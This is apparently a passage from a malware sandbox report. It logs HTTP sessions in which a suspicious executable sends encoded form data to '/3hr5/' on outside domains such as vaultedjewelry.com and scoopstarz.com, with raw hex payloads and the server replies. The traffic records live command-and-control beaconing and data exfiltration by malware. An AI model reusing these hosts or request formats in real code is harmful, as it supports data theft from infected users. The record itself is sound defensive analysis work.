                                                                                                                              Dec 4, 2023 15:25:21.748725891 CET2626OUTData Raw: 68 37 70 41 69 61 2b 51 6c 58 76 54 49 53 64 4c 4f 4e 77 5a 75 6a 73 65 33 6b 6d 33 50 42 58 7a 68 71 50 44 55 6c 6a 76 4a 47 46 6b 42 74 66 2b 68 31 4e 37 57 64 79 57 30 2f 6e 6d 51 37 48 4a 74 2f 67 44 36 59 56 44 78 68 61 61 49 63 51 51 39 77
                                                                                                                              Data Ascii: h7pAia+QlXvTISdLONwZujse3km3PBXzhqPDUljvJGFkBtf+h1N7WdyW0/nmQ7HJt/gD6YVDxhaaIcQQ9wfKwijy32xBnpNTIzD0VbUbQBw6ShnShSdZtZIAu8cEWbiJwZcHkwOCTcFcDlkBWEcxkXkcjeWGcxZwosVeNGaSm/4HswBegKR38FTrt2DVEkxB8HJkNv6qabcGH0hSKlDsvkTjRtozqmbNWGEMljxXh+j2I/69rxB
                                                                                                                              Dec 4, 2023 15:25:21.748893976 CET2626OUTData Raw: 45 67 43 2b 76 7a 41 6e 6e 76 30 6f 53 2b 39 78 71 54 6f 6b 4b 50 55 77 53 43 65 4e 78 63 36 73 71 33 65 55 42 73 32 56 4a 42 50 64 4b 4e 6f 46 6f 69 73 34 58 75 65 44 76 71 61 6f 6d 45 72 64 6a 48 64 61 54 73 36 7a 41 6a 58 4f 77 7a 79 79 51 39
                                                                                                                              Data Ascii: EgC+vzAnnv0oS+9xqTokKPUwSCeNxc6sq3eUBs2VJBPdKNoFois4XueDvqaomErdjHdaTs6zAjXOwzyyQ9pPlX/AtOK5GIC09gT9IW2X06Q6yPaDvjUDV8cOTewAHuzZhM3h5Tz/zV4QuJw+zrtC588SNWIRbAD1JKxqCu0xVM2rmGQlHilJs5qMNEUU9FLt42A0BTCSNYhevaKBn6Uy3Ak3OC654IyclRijUJ2qm61ZXwAPBr7
                                                                                                                              Dec 4, 2023 15:25:21.749070883 CET7770OUTData Raw: 6f 67 6a 4a 46 53 66 52 43 50 66 43 56 71 43 6e 66 45 44 63 49 2b 49 6f 51 35 48 47 4f 53 6e 45 44 4f 53 68 68 57 30 31 7a 34 41 34 6f 36 6f 69 31 35 61 4d 6e 45 6c 51 66 45 54 6d 37 45 4f 6c 6c 77 44 79 58 36 58 46 4d 51 6f 6b 6e 56 42 37 41 64
                                                                                                                              Data Ascii: ogjJFSfRCPfCVqCnfEDcI+IoQ5HGOSnEDOShhW01z4A4o6oi15aMnElQfETm7EOllwDyX6XFMQoknVB7AdJxKIh4lpzldeyd75mp9Wnyr8RWnkbZOL8+NfWn5Z9MGCLmDH03L1rqsrx4mhBLFoBmJYMWdWxPBoXQG5YrTcpMYClrXFTrtDaMrqeMS5FjuMy3LZ+qs83LNOVaRpsYHFqSExmT+eQC2uYbyhQXhI/VQ1RRpoRGoF6
                                                                                                                              Dec 4, 2023 15:25:21.749238014 CET3912OUTData Raw: 64 6b 2b 43 4a 46 4c 69 74 7a 35 50 50 48 30 75 31 50 4b 58 56 59 44 61 42 38 46 53 61 74 57 55 50 6b 7a 37 44 73 6a 7a 73 61 57 4b 59 53 50 76 51 43 73 55 69 6b 64 30 4c 44 2f 34 46 58 78 2b 2b 45 49 73 41 41 33 47 65 57 4f 39 50 2f 6c 4f 49 38
                                                                                                                              Data Ascii: dk+CJFLitz5PPH0u1PKXVYDaB8FSatWUPkz7DsjzsaWKYSPvQCsUikd0LD/4FXx++EIsAA3GeWO9P/lOI8+hX79Tx1QNBXFS18PRny2uC0lxpezAJP3fFEsLn4uYal8y+bOayPtkXRutPmhGet3MhVVjXPAcXFq+OqmUT+o6/FSxsMFJ22YeVyTRTSjZevm1Oc2JT5sjfquz92W49hZ0Q6l9sxpDVw3rh+Md9Jzs3MAp1qUnpw8
                                                                                                                              Dec 4, 2023 15:25:21.749403954 CET3912OUTData Raw: 72 64 70 4b 47 55 4b 74 4d 48 38 51 4e 66 30 73 58 51 7a 67 2f 6d 59 63 38 73 53 70 6e 5a 63 38 72 30 4c 6a 68 39 4d 63 74 54 79 59 58 6d 4f 63 47 7a 47 79 52 79 52 58 79 4e 57 4c 47 53 6d 59 4d 59 2b 39 6c 73 72 72 56 37 36 75 64 37 4a 6d 58 66
                                                                                                                              Data Ascii: rdpKGUKtMH8QNf0sXQzg/mYc8sSpnZc8r0Ljh9MctTyYXmOcGzGyRyRXyNWLGSmYMY+9lsrrV76ud7JmXfar6jIhZTq+uwnfkKNN+bf0q+QPJjtj/DnCYnTTO40OT13jQntn4WNx1VVavLoWLX+eMtetQogsQ9StGmalzns5pcYEzPWAEGF7f4I0lFuqokqJJbMCvDQ7rAu4eJoKb+eqi4kocgmVvdJX54An6DxifvrSDEGA+zN
                                                                                                                              Dec 4, 2023 15:25:21.844921112 CET2626OUTData Raw: 79 69 44 53 49 62 68 4a 78 4c 43 59 4e 44 4c 34 34 75 78 48 48 30 6c 76 63 49 4e 7a 45 4b 67 6d 38 38 54 4d 6f 6a 46 2f 44 4e 7a 2f 49 56 4c 47 2f 32 4b 65 6f 68 56 73 64 4c 6e 6c 4c 4a 4c 75 35 36 70 77 62 4b 58 35 4f 46 42 4e 72 4d 4f 38 41 68
                                                                                                                              Data Ascii: yiDSIbhJxLCYNDL44uxHH0lvcINzEKgm88TMojF/DNz/IVLG/2KeohVsdLnlLJLu56pwbKX5OFBNrMO8AhNHZcr0LkZ1O24CK3/ThPVqeEk3MzSTcH5YEgA3Lqtja9I/5bReRB3fhnqavGECKkidFdtZ8w9Vxad4YfCQNe8wWTq9y1Cf4tKqPmz80udAEAr1r9Oh7IlXSuDFYdRv7ytp4Xy4z1xSqA1tP/3ItGpM/BeyBx3kaRF
                                                                                                                              Dec 4, 2023 15:25:21.844993114 CET2626OUTData Raw: 77 72 33 33 4c 6f 55 31 67 64 35 73 61 66 64 55 31 69 6f 78 36 75 53 39 4e 58 65 47 45 49 37 4a 4c 51 64 74 6d 48 37 4f 56 57 50 63 4e 34 6a 4a 75 2b 6b 58 47 4d 62 34 56 6b 44 52 47 35 4e 2f 5a 61 30 6b 4d 50 37 70 6d 31 4a 75 49 4a 30 33 6f 67
                                                                                                                              Data Ascii: wr33LoU1gd5safdU1iox6uS9NXeGEI7JLQdtmH7OVWPcN4jJu+kXGMb4VkDRG5N/Za0kMP7pm1JuIJ03ogP//gQX8iT5Nbk9dpulJBEZyOeEuaGLvVSVQy+ipvpOgpDxj7pE8bVmUyrkZo0H9uCkuhYRAg0cuA6p4rl7wt81Oqxk7kZVuPQ/DUZh/hpr7NObZI8nlKcVcoxTVOlGlQH67eTGOmCc1TkOPkfU3qEi3CS1Ec2+YhZ
                                                                                                                              Dec 4, 2023 15:25:21.845057964 CET2626OUTData Raw: 2f 30 52 35 67 6f 50 2b 4a 2f 4b 49 65 77 33 67 56 78 74 50 55 66 7a 6e 57 53 6c 4c 67 50 2b 49 6d 4b 54 43 72 78 2f 57 6c 57 6a 32 34 68 4a 47 78 30 58 6b 6c 6c 4e 51 4d 68 73 38 33 74 6e 4a 6e 45 55 6b 35 41 4c 62 4e 51 6f 65 4b 32 73 59 64 6e
                                                                                                                              Data Ascii: /0R5goP+J/KIew3gVxtPUfznWSlLgP+ImKTCrx/WlWj24hJGx0XkllNQMhs83tnJnEUk5ALbNQoeK2sYdnavv51c/JwImGUIlu8mqT9avMRg/Cn8kPQ8HbAiE3/PqQLilRirDAKKUcG3trbO0rLErIKIozJTy/J61au+Gvbxwz8AqBo2aE39TEw4P6Pgyz5+G4q//gQ5LDYVDRf4Nt3IuyBaM8SHegjxgR7dJlJU7Z50OFystrB
                                                                                                                              Dec 4, 2023 15:25:22.158212900 CET588INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:25:22 GMT
                                                                                                                              Content-Length: 0
                                                                                                                              Connection: close
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4owVqgp4XXDIlLhwBxX3ocWU05AF%2FfcjPOtOwS9OAYll5T8jVYxdDqhsb7E29wVxuEpnx17a1DS4CU6aPHAHzl1mEiTzSumNtG5fJ%2FcXvcAW215vAMWJxckblqA2fhich1sMFGU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8304b7dea89d443e-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              44192.168.11.2050175172.67.202.151808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:25:24.279675961 CET532OUTGET /3hr5/?TZd=Ap4TCNxJOGTwjJSJsQdbrLTufwm/fHI6SBhQgXxPQrxr/rPwO1BNXP+VLlfTCp45O178MqQRyNXbll1g47V3CH2eQGoyL5qC3A==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.scoopstarz.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:25:24.525379896 CET596INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:25:24 GMT
                                                                                                                              Content-Length: 0
                                                                                                                              Connection: close
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z%2FJ6TUxCea8%2BkhOSeci%2B8ljZDO2SEyta3VRoXa6V21cu82KDheHdgFDGwY%2BuNoejpA%2BwCgiWnjHzdDaCV%2BP5USI1O26Rb6HxI3vg7UMSQN9WNipGkjLrI1dYcMMquAe8lUWDcvk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8304b7ef1db74390-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              45192.168.11.205017691.195.240.19808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:25:29.947700977 CET819OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.vaultedjewelry.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.vaultedjewelry.com
                                                                                                                              Referer: http://www.vaultedjewelry.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 4a 67 4c 45 68 75 53 71 34 50 39 53 4e 77 78 2f 49 56 4d 63 55 42 57 4f 55 66 7a 49 4a 55 73 77 6b 52 61 63 6f 74 51 6e 53 4d 65 48 31 74 6f 77 30 4b 4f 67 53 47 68 6b 4a 39 49 64 57 41 63 50 31 69 6a 52 44 52 53 78 58 42 47 45 79 68 35 39 38 5a 61 69 59 49 31 53 79 5a 39 68 48 37 31 6f 61 6c 63 4d 34 6d 70 44 32 6a 38 39 77 4b 75 76 71 4c 32 6a 56 75 55 44 4a 79 6d 44 47 34 53 73 4e 6e 65 33 50 2f 2f 51 4d 67 4d 67 38 34 45 6f 51 44 49 57 33 54 5a 4d 46 66 55 63 76 72 43 32 73 4b 6e 51 39 68 37 70 46 69 2b 75 32 57 2b 76 43 41 3d 3d
                                                                                                                              Data Ascii: TZd=JgLEhuSq4P9SNwx/IVMcUBWOUfzIJUswkRacotQnSMeH1tow0KOgSGhkJ9IdWAcP1ijRDRSxXBGEyh598ZaiYI1SyZ9hH71oalcM4mpD2j89wKuvqL2jVuUDJymDG4SsNne3P//QMgMg84EoQDIW3TZMFfUcvrC2sKnQ9h7pFi+u2W+vCA==
                                                                                                                              Dec 4, 2023 15:25:30.130614042 CET353INHTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:25:30 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              46192.168.11.205017791.195.240.19808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:25:32.660418987 CET1159OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.vaultedjewelry.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.vaultedjewelry.com
                                                                                                                              Referer: http://www.vaultedjewelry.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 4a 67 4c 45 68 75 53 71 34 50 39 53 58 51 42 2f 62 69 59 63 56 68 57 4a 59 2f 7a 49 44 30 73 4f 6b 52 6d 63 6f 73 56 69 52 2b 4b 48 30 4a 73 77 31 50 36 67 54 47 68 6b 42 64 49 69 53 41 64 42 31 69 6e 6a 44 56 61 78 58 42 53 45 6a 48 4e 39 37 70 61 68 54 6f 31 56 31 5a 39 67 44 37 31 6d 61 6c 59 32 34 6e 4e 44 33 54 51 39 69 63 61 76 75 5a 50 31 52 4f 55 2f 50 79 6e 56 54 49 53 71 4e 6e 61 4a 50 2b 47 6c 4e 54 51 67 2f 5a 6b 6f 54 44 49 56 35 6a 5a 50 4f 2f 56 4f 6d 35 72 78 70 4d 6a 41 6e 43 6e 6d 64 7a 4c 74 79 43 2f 77 5a 56 2f 6d 52 79 78 77 54 61 33 36 58 54 6f 53 70 54 51 50 57 76 4e 66 50 66 59 6d 5a 6b 6e 34 48 6f 6f 4c 57 50 76 4a 76 6d 33 65 52 74 2f 44 53 49 48 58 41 2f 56 63 4a 65 5a 59 61 45 36 32 48 32 6e 59 38 72 30 35 55 72 61 45 5a 66 44 65 50 4f 65 42 67 75 56 64 77 44 7a 59 49 55 51 6d 34 6d 67 32 32 67 34 33 4e 63 74 4c 4e 7a 38 70 6d 2b 66 32 72 33 61 73 39 56 41 42 66 6d 6b 33 4f 6d 6e 4a 38 44 65 38 51 44 49 2f 53 6b 71 4f 4b 62 36 4a 63 6a 4d 33 43 37 51 74 2f 63 2f 67 51 2b 5a 4f 72 50 31 74 69 7a 32 6e 77 56 63 6d 49 66 63 55 4c 42 39 7a 55 70 4c 73 76 59 76 47 48 62 4d 72 39 57 48 68 72 6e 6a 37 32 41 44 68 75 33 50 43 34 31 56 74 38 61 62 57 6d 6c 41 68 45 4f 62 51 77 78 58 6b 4b 4f 42 49 36 68 4c 47 65 46 77 38 41 33 42 30 55 58 6e 72 38 4e 58 44 50 52 54 36 59 48 53 4b 44 54 74 57 2f 68 37 77 52 31 6f 54 62 4d 49 37 56 4d 2b 4c 66 55 50 6e 46 2f 38 77 58 4f 47 7a 46 2f 53 34 62 45 42 44 4f 62 53 7a 57 55 6d 42 4f 5a 49 6b 72 4f 75 4b 79 30 50 6e 78 67 57 65 55 56 46 50 68 61 46 6f 35 37 77 37 72 36 4d 3d
                                                                                                                              Data Ascii: TZd=JgLEhuSq4P9SXQB/biYcVhWJY/zID0sOkRmcosViR+KH0Jsw1P6gTGhkBdIiSAdB1injDVaxXBSEjHN97pahTo1V1Z9gD71malY24nND3TQ9icavuZP1ROU/PynVTISqNnaJP+GlNTQg/ZkoTDIV5jZPO/VOm5rxpMjAnCnmdzLtyC/wZV/mRyxwTa36XToSpTQPWvNfPfYmZkn4HooLWPvJvm3eRt/DSIHXA/VcJeZYaE62H2nY8r05UraEZfDePOeBguVdwDzYIUQm4mg22g43NctLNz8pm+f2r3as9VABfmk3OmnJ8De8QDI/SkqOKb6JcjM3C7Qt/c/gQ+ZOrP1tiz2nwVcmIfcULB9zUpLsvYvGHbMr9WHhrnj72ADhu3PC41Vt8abWmlAhEObQwxXkKOBI6hLGeFw8A3B0UXnr8NXDPRT6YHSKDTtW/h7wR1oTbMI7VM+LfUPnF/8wXOGzF/S4bEBDObSzWUmBOZIkrOuKy0PnxgWeUVFPhaFo57w7r6M=
                                                                                                                              Dec 4, 2023 15:25:32.843151093 CET353INHTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:25:32 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              47192.168.11.205017891.195.240.19808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:25:35.363706112 CET2626OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.vaultedjewelry.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.vaultedjewelry.com
                                                                                                                              Referer: http://www.vaultedjewelry.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 4a 67 4c 45 68 75 53 71 34 50 39 53 58 51 42 2f 62 69 59 63 56 68 57 4a 59 2f 7a 49 44 30 73 4f 6b 52 6d 63 6f 73 56 69 52 2b 79 48 31 38 34 77 30 6f 57 67 4a 47 68 6b 64 4e 49 5a 53 41 64 4d 31 69 66 64 44 56 57 68 58 43 71 45 67 51 4a 39 36 66 75 68 57 6f 31 55 70 4a 39 69 48 37 31 79 61 6c 63 45 34 6e 70 35 32 6a 6b 39 77 50 53 76 70 6f 4f 6a 5a 2b 55 44 50 79 6d 48 43 34 54 56 4e 6e 57 5a 50 2b 4b 6c 4e 51 30 67 39 71 4d 6f 52 30 6b 56 30 54 5a 49 48 66 56 64 76 5a 72 45 70 4d 66 75 6e 43 6d 54 64 78 6e 74 79 46 4c 77 61 53 72 68 51 53 78 77 61 36 33 35 42 6a 30 57 70 51 6c 61 57 73 52 66 50 59 6b 6d 59 45 6e 34 4d 71 41 55 52 76 76 51 2b 57 32 47 63 4e 44 62 53 49 6a 44 41 39 35 63 4a 76 39 59 49 6e 53 32 46 58 6e 59 31 72 30 2f 51 72 61 54 58 50 44 43 50 4f 4f 33 67 71 6b 6f 77 42 2f 59 49 31 77 6d 7a 6b 59 31 69 51 34 78 51 73 74 6b 47 54 77 39 6d 2b 50 63 72 33 61 38 39 55 45 42 66 58 55 33 50 6b 50 4b 78 7a 66 56 4a 7a 49 51 4a 30 32 2b 4b 62 32 33 63 67 63 6e 43 34 63 74 38 38 2f 67 56 5a 74 4a 35 66 31 71 39 6a 32 4c 75 6c 64 6b 49 66 51 2b 4c 41 34 47 55 5a 58 73 75 6f 2f 47 44 4c 4d 6f 34 32 48 6c 68 48 6a 78 67 77 44 68 75 33 43 78 34 31 52 74 2f 6f 4c 57 6b 58 6f 68 55 4e 44 51 79 78 57 76 4b 4f 42 56 36 68 48 31 65 46 34 57 41 33 78 61 55 52 58 72 39 63 6e 44 4d 54 37 35 64 33 53 50 48 54 74 46 37 68 32 77 52 30 41 6c 62 4d 5a 47 56 62 4f 4c 52 33 6e 6e 58 50 38 76 52 75 47 30 43 2f 53 79 66 45 4d 43 4f 62 4f 6a 57 55 53 6f 4f 61 49 6b 76 61 2f 65 76 32 62 4c 6a 43 65 44 4b 51 68 64 6e 34 56 41 39 70 77 64 77 4b 2f 37 59 32 6e 58 64 58 76 43 65 79 34 44 64 45 41 53 48 38 65 72 4c 53 42 30 66 50 73 58 6c 37 4d 49 68 6d 50 4c 4a 38 32 51 2f 42 63 2b 5a 39 46 36 57 62 4e 6e 31 6e 46 45 63 6f 43 54 53 43 70 42 53 64 47 48 57 78 65 65 48 56 72 75 75 62 70 52 35 44 72 65 4f 56 63 48 4a 64 38 54 62 35 41 72 55 59 73 62 77 4e 6f 62 61 39 38 6f 77 71 34 4b 6d 42 36 4d 73 37 2f 30 50 65 58 74 4d 78 62 65 48 71 68 49 72 77 5a 59 32 52 70 6d 31 44 56 45 4d 42 69 66 32 33 61 4c 41 53 6d 50 47 32 43 4f 6e 48 39 44 45 59 76 51 39 78 79 38 48 33 44 59 31 63 70 39 6c 2f 44 69 64 52 38 54 45 37 64 37 64 30 56 77 5a 55 32 51 71 35 69 51 78 71 48 75 6a 4c 71 57 74 57 53 31 4e 55 6e 4f 43 4c 49 58 57 70 47 79 73 67 41 36 46 76 65 50 68 67 61 4d 4d 54 4d 41 57 41 49 76 32 48 37 6c 38 78 38 61 41 58 43 76 75 35 61 47 4d 41 6a 36 79 71 65 73 38 72 62 41 65 57 78 35 63 38 49 58 49 46 45 7a 56 6a 75 4f 4e 37 6e 47 6f 6d 49 37 74 67 79 62 6d 76 4f 35 58 2f 4a 2b 31 53 2f 50 56 35 55 50 5a 64 36 6a 55 41 6d 65 33 55 32 32 2b 75 77 6a 33 4f 61 79 66 53 36 53 47 36 51 4f 77 41 6b 36 68 58 55 45 71 37 6e 73 73 69 4e 74 37 48 6c 54 65 48 32 74 50 61 37 32 2f 6e 46 72 2b 48 39 50 48 36 53 38 56 48 62 58 58 5a 76 49 53 59 69 46 32 37 39 42 68 38 46 76 58 5a 30 31 4e 50 6f 71 44 30 49 72 45 30 48 35 68 6b 59 6c 48 47 4d 49 6c 6a 4f 53 72 46 59 66 31 38 47 73 7a 2b 70 53 31 72 55 41 51 75 75 48 41 66 6a 70 53 30 51 4a 32 48 34 47 54 78 36 6a 6b 2b 4b 44 6a 34 75 42 78 44 63 65 6c 4f 53 61 47 53 69 7a 69 32 6f 4b 2b 32 54 41 54 74 69 39 79 4a 4a 52 79 77 2b 6c 52 67 72 4f 32 77 51 63 52 71 54 75 30 64 77 35 38 50 6f 6b 76 62 65 78 72 4a 4b 4a 45 56 5a 6d 67 74 77 38 37 54 77 49 6b 55 5a 65 50 6b 7a 6d 6b 6b 64 53 54 50 33 37 2f 4c 59 72 34 30 49 68 47 70 43 35 4d 6a 63 58 73 46 2f 42 75 43 73 52 4c 39 47 38 38 45 55 73 30 31 68 67 57 32 71 69 50 5a 34 4c 58 77 55 67 53 35 7a 32 68 38 69 61 5a 43 73 59 50 57 56 39 56 66 61 4e 71 31 79 6b 4a 42 34 4b 4a 79 2b 66 77 44 48 74 43 39 47 52 4e 56 70 4d 68 73 61 70 34 61 75 31 5a 73 4e 51 41 62 7a 4b 39 4f 37 42 54 6d 72 4e 4e 32 43 66 6c 47 6a 78 66 6e 47 6f 50 6a 70 75 54 59 36 7a 77 52 41 58 67 4e 77 46 53 75 73 70 59 61 4a 6a 36 69 6b 41 33 77 54 76 79 39 6b 62 44 52 2b 62 59 75 47 65 57 48 55 51 4a 73 4c 59 62 73 33 35 46 31 6a 32 78 70 75 39 6c 4e 30 34 4d 57 49 6c 38 52 30 51 64 53 6c 2b 68 77 48 66 65 48 34 64 36 52 42 71 42 6e 65 49 4c 5a 53 4b 4b 76 48 38 56 71 73 53 71 7a 74 67 59 6e 33 77 67 53 2b 35 69 61 79 4c 4d 30 5a 54 59 47 37 4a 49 61 44 39 2f 74 5a 34 36 39 2b
                                                                                                                              Data Ascii: TZd=JgLEhuSq4P9SXQB/biYcVhWJY/zID0sOkRmcosViR+yH184w0oWgJGhkdNIZSAdM1ifdDVWhXCqEgQJ96fuhWo1UpJ9iH71yalcE4np52jk9wPSvpoOjZ+UDPymHC4TVNnWZP+KlNQ0g9qMoR0kV0TZIHfVdvZrEpMfunCmTdxntyFLwaSrhQSxwa635Bj0WpQlaWsRfPYkmYEn4MqAURvvQ+W2GcNDbSIjDA95cJv9YInS2FXnY1r0/QraTXPDCPOO3gqkowB/YI1wmzkY1iQ4xQstkGTw9m+Pcr3a89UEBfXU3PkPKxzfVJzIQJ02+Kb23cgcnC4ct88/gVZtJ5f1q9j2LuldkIfQ+LA4GUZXsuo/GDLMo42HlhHjxgwDhu3Cx41Rt/oLWkXohUNDQyxWvKOBV6hH1eF4WA3xaURXr9cnDMT75d3SPHTtF7h2wR0AlbMZGVbOLR3nnXP8vRuG0C/SyfEMCObOjWUSoOaIkva/ev2bLjCeDKQhdn4VA9pwdwK/7Y2nXdXvCey4DdEASH8erLSB0fPsXl7MIhmPLJ82Q/Bc+Z9F6WbNn1nFEcoCTSCpBSdGHWxeeHVruubpR5DreOVcHJd8Tb5ArUYsbwNoba98owq4KmB6Ms7/0PeXtMxbeHqhIrwZY2Rpm1DVEMBif23aLASmPG2COnH9DEYvQ9xy8H3DY1cp9l/DidR8TE7d7d0VwZU2Qq5iQxqHujLqWtWS1NUnOCLIXWpGysgA6FvePhgaMMTMAWAIv2H7l8x8aAXCvu5aGMAj6yqes8rbAeWx5c8IXIFEzVjuON7nGomI7tgybmvO5X/J+1S/PV5UPZd6jUAme3U22+uwj3OayfS6SG6QOwAk6hXUEq7nssiNt7HlTeH2tPa72/nFr+H9PH6S8VHbXXZvISYiF279Bh8FvXZ01NPoqD0IrE0H5hkYlHGMIljOSrFYf18Gsz+pS1rUAQuuHAfjpS0QJ2H4GTx6jk+KDj4uBxDcelOSaGSizi2oK+2TATti9yJJRyw+lRgrO2wQcRqTu0dw58PokvbexrJKJEVZmgtw87TwIkUZePkzmkkdSTP37/LYr40IhGpC5MjcXsF/BuCsRL9G88EUs01hgW2qiPZ4LXwUgS5z2h8iaZCsYPWV9VfaNq1ykJB4KJy+fwDHtC9GRNVpMhsap4au1ZsNQAbzK9O7BTmrNN2CflGjxfnGoPjpuTY6zwRAXgNwFSuspYaJj6ikA3wTvy9kbDR+bYuGeWHUQJsLYbs35F